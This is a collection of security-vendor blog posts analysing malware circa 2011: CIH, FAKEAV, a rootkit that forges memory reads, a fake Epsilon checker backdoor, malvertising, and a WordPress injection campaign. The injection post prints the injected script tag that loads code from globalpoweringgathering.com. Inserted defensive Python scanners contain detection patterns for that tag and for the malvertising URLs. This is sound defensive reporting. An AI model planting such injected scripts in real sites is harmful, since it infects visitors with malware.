This action-packed romantic drama is based on the destructive ‘I Love You’ computer virus. This virus spread around the globe at the turn of the millennium, shutting down computer systems at the Pentagon, Parliament and the CIA. For Victor he will do anything to reconnect with the only woman he’s ever loved – even if that means entangling himself in an international criminal investigation. Never have the words “I love you” almost ruined the world.

It sounds like your usual story of “Boy meets girl. Loses girl. Writes computer virus to infect millions of computers around the world to tell girl he loves her. Gets girl.” Nothing out of the ordinary there, then.

Inspired by true events? Hmm.. well, not with the greatest precision. The real Love Bug wasn’t written to impress a girl, but instead attempted to steal internet passwords. One wonders also if the film’s producers will engage in any err.. viral marketing to promote it.

I don’t want to come across as too much of a fuddy-duddy, but let’s hope the movie doesn’t glorify too much the creation of malware. Even in the days of the Love Bug it was a problem which could have a serious impact on businesses and home users.

If you’re able to get to the movie premiere and see “Subject: I Love You” why not leave a comment with your review of the film?

Posted in Sophos

Memories of the Chernobyl virus

Today is the 25th anniversary of the explosion at the Chernobyl nuclear power plant, which resulted in the world’s worst nuclear accident.

Vigils have been held to commemorate the disaster, where an explosion and fire released a large cloud of radioactive contamination into the air, spreading over much of Western Russia and Europe.

No doubt the anniversary has extra resonance following recent events in Japan, at the Fukushima nuclear plant.

However, the relevance of today’s date for Naked Security is the virus that bears Chernobyl’s name.

The CIH virus, also known as Chernobyl, was first discovered in 1998, and quickly became one of the most commonly encountered viruses in the wild.

Although never as widespread as other malware of the time such as the Melissa virus, the appearance of a number of magazine cover CDs, with programs infected with CIH, no doubt assisted its wide distribution.

But it was CIH’s payload which created the biggest cause for concern.

CIH was dubbed “Chernobyl” by the media because it was programmed to activate its destructive payload on the anniversary of the Chernobyl reactor meltdown – 26th April – wiping data from victims’ hard drives and overwriting the computer’s BIOS chip, making the computer unusable.

For the first time ever, we had encountered a virus which – if it had activated its payload – required a hardware fix. If you were unlucky enough to have your BIOS chip wiped, the Chernobyl virus had effectively turned your computer into a useless lump of plastic – the only way to get your PC working again was to open it up and replace the chip.

And don’t forget – on some computers, the BIOS chip wasn’t removable, and so it could only be replaced by swapping the entire motherboard.

For such a destructive computer virus to be so prevalent, and with April 26th 1999 approaching, was a real cause for concern. And in Asia it was reported to hit particularly hard.

For instance, South Korean government reports claimed that the Chernobyl virus caused $250 million damage, infecting a quarter of a million computers.

So who wrote the Chernobyl virus, and why?

The first point to bear in mind is that there’s no suggestion that the author of the virus intended it to be called “Chernobyl”. That was a name dreamt up purely because of the coincidence of the virus’s payload activation date, rather like the infamous Michelangelo virus was also given that name because it happened to be programmed to trigger on the anniversary of the artist’s birth.

In fact, many in the anti-virus community chose to call the virus by another name – CIH. This name was chosen from a plaintext string inside the virus’s code:

CIH v1.2 TTIT

CIH code

The Chernobyl name stuck, of course, and helped to fuel headlines about the virus and its particularly devastating payload. Little did we know that the phrase “CIH v1.2 TTIT” would help identify the virus’s author, but also where it had been created.

On April 30, 1999, four days after the virus’s damaging payload disrupted computers around the world, Taiwanese police announced that they were questioning 24 year-old Chen Ing Hau about the virus.

Former classmates at Taipei’s Tatung Institute of Technology said that Chen had boasted of creating the virus, and warned them not to allow their computers to become infected.

I’ll spell it out, in case you haven’t twigged yet:

Chen Ing Hau = CIH
Taipei Tatung Institute of Technology = TTIT

The Taiwanese authorities, it seemed, had got their man and it looked likely that Chen Ing Hau would be punished.

But the story doesn’t end there. Because – astonishingly – although the virus had caused serious levels of damage to computers in many countries no-one appeared to have filed a complaint in Taiwan. And without any local victims coming forward, Chen Ing Hau seemed to have got away with it.

Chen subsequently won a job at a software company on the back of his infamy.

It wasn’t until almost 18 months later, in September 2000, that a Taiwanese student reported his computer had been hit by the virus and Chen Ing Hau was finally detained.

However, as far as I have been able to determine (and I would love to hear if anyone has further information), Chen escaped with a reprimand and was never fined or imprisoned for the CIH virus he created.

Indeed, he appears to have repented for his past misdemeanours and a quick Google discovers that he has been giving talks at technology conferences such as FreedomHEC Taipei in 2009.

Here’s a photograph of Chen speaking at that conference, in front of a large screen of code discussing how Linux drivers can be reverse engineered.

I wonder if he still signs his code “CIH”?

Viruses like CIH/Chernobyl were becoming a rarity even in the late 1990s. More and more malware authors were turning their backs on destructive payloads, and implementing sneakier forms of attack instead.

As making money, rather than wanton destruction, became the primary motivation for malware authors, cybercriminals realised that attacks which drew attention to themselves with dramatic payloads would work against their plans of stealing information from compromised PCs.

Posted in Sophos

Stars virus: Iran claims to intercept second cyberwarfare attack

Iranian officials today claimed to have intercepted a cyberwarfare attack, involving malware designed to spy upon government systems.

The malware has been dubbed the “Stars” virus by Gholamreza Jalali, the head of Iran’s civil defence organisation, who broke the news on the institution’s website.

Jalali says that the Stars virus continues to be investigated by the country’s experts, and that it could have been “mistaken for executive files of governmental organisations”. That suggests that the attack may have been disguised as a legitimate Word, PDF file or similar document in an attempt to trick unsuspecting victims into infecting government computers.

Inevitably, many people will remember the brouhaha that surrounded the Stuxnet virus last year, and sure enough the media has jumped upon the story of the new Stars virus.

Unfortunately, we can’t tell you much about this Stars virus. As far as we know, we don’t have a sample in our malware collection – and we would really need the Iranian authorities to share what they have seen with the anti-malware community, so we can delve a little deeper.

An MD5 checksum, for instance, would quickly help us ascertain if this is a sample of some malware that we’ve seen before.

In his statement, Jalali blamed American and Israeli forces for attacking Iranian websites, but we are not able to confirm that the malware attack – if genuine – originated in either country or if it is really specifically targeting Iranian systems.

Let’s not forget, we see almost 100,000 new unique malware samples every day – much of it designed to spy upon victims’ computers. Presumably the Iranian authorities have reason to believe that the Stars virus they have intercepted was specifically written to steal information from their computers, and is not just yet another piece of spyware.

If we learn any more we’ll certainly let you know.

Posted in Sophos

DLL-Based FAKEAV Returns In The Wild

In our previous FAKEAV whitepaper, we presented how Trend Micro researchers tracked down the evolution of FAKEAV and classified its development, behavior-wise, according to generations. One of the early generations listed in the paper can be recalled as the DLL-based FAKEAV (4th Generation) – a FAKEAV group that uses a DLL file to perform all the malicious routines, primarily to avoid being terminated easily. A few months ago, however, we saw this particular generation again making its rounds in the wild, one of which we detect as TROJ_FAKEAV.BTV.


In terms of appearance, 4th generation FAKEAV does not differ in any particular way from the other FAKEAV generations. In the background, however, it can be characterized by the considerably large file size of the DLL component (samples of TROJ_FAKEAV.BTV are around 1.50MB in size). This is because the fake pop-ups, GUIs, and other scareware modules are all contained in the DLL.

FAKEAV as a Whole

Understanding how FAKEAV progressed over the years, it isn’t particularly surprising to see variants of 4th Generation FAKEAV back in the wild. For the most part we see them updating visually, rather than evolving technically. The bad guys knew that all it takes to maintain their steady supply of victims is to update the (rogue) antivirus software name and do some re-designing in their GUIs – a reason why we see so many FAKEAV GUIs today.

In parallel with these software name updates, FAKEAV also updates its registry, file, and folder names in order to evade string-based AV solutions. Nevertheless, regardless of how they update, strings will continue to be a weak point of the FAKEAV family. From them, antivirus researchers can craft generic rules/patterns for memory, process, file, and registry scanning/cleaning.

As such, we will continue to devote our time and effort to closely monitor prominent threats like the FAKEAV family, as well as provide adequate solutions to users. We advise users to keep themselves informed of the developments concerning threats such as FAKEAV, as well as to familiarize themselves with the nature of attacks. Users may refer to the guide we published last year, FAKEAV 101: How To Tell If Your Antivirus Is Fake.

Also, more information on the 4th Generation FAKEAV, as well as the other generations, is available in our report, The Dangers Rogue Antivirus Threats Pose.

Posted in Trendmicro

Mass infections – globalpoweringgathering.com

We first detected malware from globalpoweringgathering.com almost a month ago, and posted on our blog about it. But just in the last few days, we have started to see a big increase in the number of sites infected with it.

We were able to catalog almost 3 thousand sites with this malware, and Google lists almost 2 thousand sites on its Safe Browsing page (and the number is growing each day – just yesterday it was less than 1 thousand):

Has this site hosted malware?

Yes, this site has hosted malicious software over the past 90 days. It infected 1815 domain(s), including clonestop.com/, warseer.com/, showbiz411.com/.

In our original post, we explained that this malware was injecting an encoded JavaScript directly into the WordPress database. However, in the latest infections, we are seeing the following code added directly to the HTML or PHP files (with no obfuscation):

<script src="http://globalpoweringgathering.com/in.php?n=15"..

There are some variations, with just the number changing:

http://globalpoweringgathering.com/in.php?n=15

http://globalpoweringgathering.com/in.php?n=25

http://globalpoweringgathering.com/in.php?n=2

http://globalpoweringgathering.com/in.php?n=9

Note that this is very similar to the “Hilary Kneber” malware distributed by these domains (hosted on the same IP addresses):

globalpoweringgathering.com
lessthenaminutehandle.com
lessthenaseconddeal.com
welcometotheglobalisnet.com
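A defender-side check for the injection described above, added here as an example and not part of the original post: it looks through file contents for a `<script src>` tag pointing at the `in.php?n=` URL on any of the four domains listed, tolerating the varying `n=` value. The sample web-root contents, their paths and the `scan_files` helper are constructed for the demo.

```python
import re
from typing import Dict, List
# Domains named in the post as serving the injected script (same hosting IPs).
INJECTOR_DOMAINS = {
    "globalpoweringgathering.com",
    "lessthenaminutehandle.com",
    "lessthenaseconddeal.com",
    "welcometotheglobalisnet.com",
}

# <script ... src="http://<host>/in.php?n=<number>">; only the n= value varied
# between the infections described in the post, so it is captured, not fixed.
SCRIPT_SRC_RE = re.compile(
    r"""<script\b[^>]*\bsrc\s*=\s*["']?\s*https?://([a-z0-9.-]+)/in\.php\?n=(\d+)""",
    re.IGNORECASE,
)

def find_injected_scripts(content: str) -> List[dict]:
    """Return one record (host, n value, line number) per injected tag in one file."""
    hits = []
    for lineno, line in enumerate(content.splitlines(), start=1):
        for m in SCRIPT_SRC_RE.finditer(line):
            host, n = m.group(1).lower(), m.group(2)
            if host in INJECTOR_DOMAINS:
                hits.append({"host": host, "n": n, "line": lineno})
    return hits

def scan_files(files: Dict[str, str]) -> Dict[str, List[dict]]:
    """Scan a mapping of path -> contents (e.g. every .html/.php under the web root)."""
    report = {}
    for path, content in files.items():
        hits = find_injected_scripts(content)
        if hits:
            report[path] = hits
    return report

# Constructed sample web-root contents (hypothetical, not real infected files).
SAMPLE_FILES = {
    "index.html": (
        "<html><head><title>Shop</title>\n"
        '<script src="http://globalpoweringgathering.com/in.php?n=15"></script>\n'
        "</head><body>hello</body></html>\n"
    ),
    "wp-content/themes/x/footer.php": (
        "<?php wp_footer(); ?>\n"
        "<script src='http://LessThenASecondDeal.com/in.php?n=2'></script>\n"
        "</body></html>\n"
    ),
    "about.html": '<html><body><script src="/js/app.js"></script></body></html>\n',
}

if __name__ == "__main__":
    for path, hits in scan_files(SAMPLE_FILES).items():
        print(path, hits)
```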

How are these sites getting hacked?

We are seeing multiple causes. The most common is related to the use of old versions of web applications (WordPress, Joomla, etc.). However, we are also seeing HTML-only sites that were compromised via FTP due to stolen passwords. So make sure your sites are updated and change your passwords (making sure to use a strong password, that your desktop is not compromised, etc.).

Other domains being used as intermediaries:


If you need any help cleaning up an infected site (or someone to do it for you), let us know.

Posted in Security

Yahoo! PH Purple Hunt 2.0 Ad Compromised

The other day, I was browsing the Yahoo! PH site and the Yahoo! Purple Hunt 2.0 ad caught my attention.

Curious as I am, I clicked on the ad and, surprisingly, my browser downloaded a suspicious file named com.com.

Apparently the ad redirected me to a randomly generated URL similar to the following, which unfortunately led to the malicious download:

  • hxxp://want6.{BLOCKED}.com/se/3da19bea8f9c03e96c9b1acad9cce5a88a2244f0a34d69c09b8d3198b2797726789be0228c0df3c762ed088a2327b07f4a183fa6fa753b0acfd7f0afc2d2b13b801ba978269fcda413f53e/960b0a2a/com.com
  • hxxp://nose8.{BLOCKED}.com/se/3da19bea8f9c03e96c9b1acad9cce5a88a2244f0a34d69c09b8d3198b2797726789be0228c0df3c762ed088a2327b07f4a183fa6fa753b0acfd7f0afc2d2b13b801ba978269fcda413f53e/960b0a2a/com.com
  • hxxp://letter6.{BLOCKED}.com/se/3da19bea8f9c03e96c9b1acad9cce5a88a2244f0a34d69c09b8d3198b2797726789be0228c0f3c762ed088a2327b07f4a183fa6fa753b0acfd7f0afc2d2b13b801ba978269fcda413f53e/785c08d8/com.com

Below is a screenshot of the file download dialog box:

The downloaded file is detected by Trend Micro as TSPY_PIRMINAY.A. Let’s see how the download took place.

Firstly, the download only happens once per browser, which means that the malvertisement may have used IP and user-agent filtering of some sort to prevent multiple downloads, which would make it suspicious to the end user.

To be able to replicate the malware download from the compromised ad, we used a browser extension which spoofs browser user agents, instead of installing different browsers.

It appears that the browser is first redirected to the malware download before it is finally brought to the real advertisement page. The redirection follows this format for the download link:

http://{varying string}{random number}.{varying domain}/se/{constant string or guid}/com.com
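The download-link format above can be matched in web-proxy logs. This is an added example, not code from the original post: the log format, the `ads.example` hostnames, the client addresses and the hex identifiers are all constructed. Since the post notes that the file is served only once per IP and user agent, a single hit per client is the expected signal, and correlation is done on the constant identifier shared across the throwaway hostnames rather than on repeats.

```python
import re
from collections import defaultdict
from typing import Dict, List, NamedTuple

# Download-link format reported in the post:
#   http://{varying string}{random number}.{varying domain}/se/{constant string or guid}/com.com
# Fixed pieces: the "/se/" path and the "com.com" name; host label and hex id are captured.
REDIRECT_RE = re.compile(
    r"^https?://(?P<label>[a-z]+\d+)\.(?P<domain>[a-z0-9.-]+)"
    r"/se/(?P<ident>[0-9a-f]{16,})/(?P<suffix>[0-9a-f]{8})/com\.com$",
    re.IGNORECASE,
)

class Hit(NamedTuple):
    client: str
    user_agent: str
    host: str
    ident: str

def parse_log_line(line: str):
    """Constructed (hypothetical) proxy log format: <ts> <client_ip> <url> "<user-agent>"."""
    _ts, client, url, ua = line.rstrip("\n").split(" ", 3)
    return client, url, ua.strip('"')

def find_malvertising_downloads(lines: List[str]) -> List[Hit]:
    """Flag every request whose URL matches the com.com download pattern. The ad served
    the file once per IP/user-agent, so one hit per client is the signal; do not wait for repeats."""
    hits = []
    for line in lines:
        client, url, ua = parse_log_line(line)
        m = REDIRECT_RE.match(url)
        if m:
            host = f"{m['label']}.{m['domain']}".lower()
            hits.append(Hit(client, ua, host, m["ident"].lower()))
    return hits

def group_by_ident(hits: List[Hit]) -> Dict[str, List[str]]:
    """Many throwaway hostnames (want6, nose8, letter6 in the post) sharing one id = one campaign."""
    groups = defaultdict(set)
    for h in hits:
        groups[h.ident].add(h.host)
    return {ident: sorted(hosts) for ident, hosts in groups.items()}

# Constructed sample log lines; hostnames, addresses and identifiers are not real.
SAMPLE_LOG = [
    '1303200001 10.0.0.5 http://want6.ads.example/se/0123456789abcdef0123456789abcdef/1a2b3c4d/com.com "Mozilla/5.0 (Windows NT 6.1) Firefox/3.6"',
    '1303200002 10.0.0.5 http://ph.yahoo.example/ "Mozilla/5.0 (Windows NT 6.1) Firefox/3.6"',
    '1303200003 10.0.0.9 http://nose8.ads.example/se/0123456789abcdef0123456789abcdef/1a2b3c4d/com.com "Mozilla/4.0 (compatible; MSIE 8.0)"',
    '1303200004 10.0.0.9 http://static.cdn.example/se/logo.png "Mozilla/4.0 (compatible; MSIE 8.0)"',
]

if __name__ == "__main__":
    found = find_malvertising_downloads(SAMPLE_LOG)
    print(found)
    print(group_by_ident(found))
```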

We’d like to thank the guys over at Yahoo! Ad Security Ops for acting swiftly on our initial report, taking down the malvertisement so it could no longer harm unsuspecting users.

Posted in Trendmicro

Memory forging attempt by a rootkit

Some time ago a new rootkit appeared which at first glance seemed more similar to the initial variants of TDL3 than to the updated TDL4 variants we have seen this year. Like TDL3, it also parasitically infected a driver by inserting code in the resource directory of the PE file. In this case the name of the file it infected was hard-coded as volsnap.sys. Also similar to the early variants of TDL3, this rootkit hooked some pointers in the dispatch table (IRP hook) of the driver below disk on the device stack of the hard disk.

But it was very interesting to see that some anti-rootkit tools did not show the dispatch table hooks, which are usually pretty straightforward to identify. Also, this malware would not allow an external debugger (WinDbg) to break, which was annoying.

The reason for the hooks not being reported was that the memory being read by the tools was not the actual memory! The dispatch table as ‘seen’ by the tools was not hooked, whereas in reality it was hooked. The part that made it interesting was that the memory was being read at the correct address with a mov instruction, not via some system API that could be hooked. We know of some proof-of-concept ways to achieve this, but I had not seen this behavior from an in-the-wild threat before.

Obviously the motivation for malware authors to use such techniques is to prevent tools from showing their hooks, so that administrators are not alerted to suspicious activity.

So how does it fake memory on read access? This rootkit uses hardware breakpoints (DRx register settings) to monitor access to the kernel memory areas that it patches. In addition to modifying the DR0 register, it hooks the KiDebugRoutine pointer so that it is notified when the hardware breakpoint is triggered by a memory access. This rootkit installs IRP hooks and sets the DR0 register to the memory address where the IRP hook is installed. So when the memory of the dispatch table is read, a ‘fake’ image with no hook in it is presented by the malware’s KiDebugRoutine hook. Following is a brief overview of the KiDebugRoutine hook code.

This is the beginning of the malware’s KiDebugRoutine handler code. If it encounters a breakpoint, the malware simply increments the instruction pointer for the thread where the exception occurred and returns as handled; otherwise the jump is taken.


KiDebugRoutine Handler – Snippet 1

Following is the target of the above jump (loc_403BCC). If the exception occurred at a kernel-mode address, then the jump to loc_404026 is taken.


KiDebugRoutine Handler – Snippet 2

At the target of the above jump, the exception is first processed normally by checking access flags, clearing the DR6 register, etc. Then the following code is used to identify whether this is a read access to the protected memory and whether the malware wants to block this particular access. If both conditions are true, the read location is altered to point to a memory area whose contents the malware wants to forge. Thus anyone the malware does not like ends up reading the wrong memory. The comments in the code below explain the details. The assumption about ESI in the code below is interesting.


KiDebugRoutine Handler – Snippet 3

This technique had been discussed before, and this example just shows again how modern rootkits are adopting techniques and evolving rapidly. In fact, after this malware we have seen yet another update in the MBR-infecting TDL4 strain, which is still using DKOM to put a ‘fake’ device object on the device stack of the hard disk. We continue to investigate and provide protection against such threats.

Posted in McAfee

Epsilon Security Connect Tool Steals More Information From Users

We were recently made aware of attacks leveraging the recent data breach that involved Epsilon.

According to reports, the attack involves a web page that looks very similar to the press release issued by Epsilon concerning the breach incident. The page instructs the recipient to click a link at the bottom of the post in order to download and run a tool that will supposedly help them determine whether their personal information was among the data disclosed during the attack.

We were able to analyze the details of the attack and found that the link downloads an .EXE file which is now detected as TROJ_MSPOSER.ASM. Running TROJ_MSPOSER.ASM displays the following GUI, which seems to suggest that some checking is being done on the system:


But of course, the graphic is really just there in an attempt to convince the victim that what they downloaded really is a tool that will help them determine whether their information is still secure. What is really happening in the background is that another malicious file is being installed on the system.

The installed malicious file is a backdoor now detected as BKDR_MSPOSER.KAX. Analyzing this file, we found out that it executes a rather long list of commands, which are mostly related to gathering information about the victim. The executed commands include:

  • Log keystrokes
  • Send Emails
  • Capture Screenshots
  • Capture Web camera
  • Record Sounds using microphone
  • Manipulate system sound volume
  • Open Webpages
  • Manipulate Files
  • Download/Upload files
  • Create/Remove directories
  • Enumerate Network Adapters
  • Execute DOS Command
  • Execute Arbitrary Commands
  • Get Access Control List Information
  • Get IP Configuration Settings
  • Get System Information (Computer Name, Manufacturer, Model, Operating System, System Type, Memory)
  • Get User name and password
  • List/Start/Kill Processes
  • Start/Stop Services
  • List Drives
  • List SQL Servers
  • Execute Netstat
  • Execute WMI commands
  • Read/Write/Delete registry values
  • Update itself
  • Remove itself
  • Get Certificates

Simply looking at the list, it appears that the cybercriminal(s) behind this attack are aiming to gather a great deal of information from their victims – probably even more than what was taken by those who breached Epsilon’s email system.

As of this writing, Epsilon has not released any kind of tool that does what the malware in this attack claims to do, and is unlikely to do so. Users who were possibly affected by the breach have already been informed of the incident through email.

Users who receive information about the existence of such a tool – regardless of medium – are strongly advised to ignore it. We have already provided protection to Trend Micro users by blocking the related IP address, as well as detecting the malicious files.

Posted in Trendmicro

CBS Money Watch / ZDnet hacked and blacklisted by Google

We are getting reports that the CBS Money Watch and some ZDNet web sites are currently distributing malware and have been blacklisted by Google. We are still investigating, but if you try to visit the CBS Money Watch site (moneywatch.com), you will get a warning from Google:

What is the current listing status for moneywatch.bnet.com/investing?

Site is listed as suspicious – visiting this web site may harm your computer.

Part of this site was listed for suspicious activity 2 time(s) over the past 90 days.

What is interesting is the web site being used to distribute the malware (zdnet.com – i.zdnet.com):

Of the 142 pages we tested on the site over the past 90 days, 76 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2011-04-19, and the last time suspicious content was found on this site was on 2011-04-19.

Malicious software includes 130 exploit(s).

Malicious software is hosted on 1 domain(s), including zdnet.com/.

If we check the diagnostic page for zdnet.com, it also says the following:

Has this site hosted malware?

Yes, this site has hosted malicious software over the past 90 days. It infected 5 domain(s), including bnet.com/, smartplanet.com/, findarticles.com/.

So something is definitely going on there. We will post more details as we investigate this issue.

Posted in Security
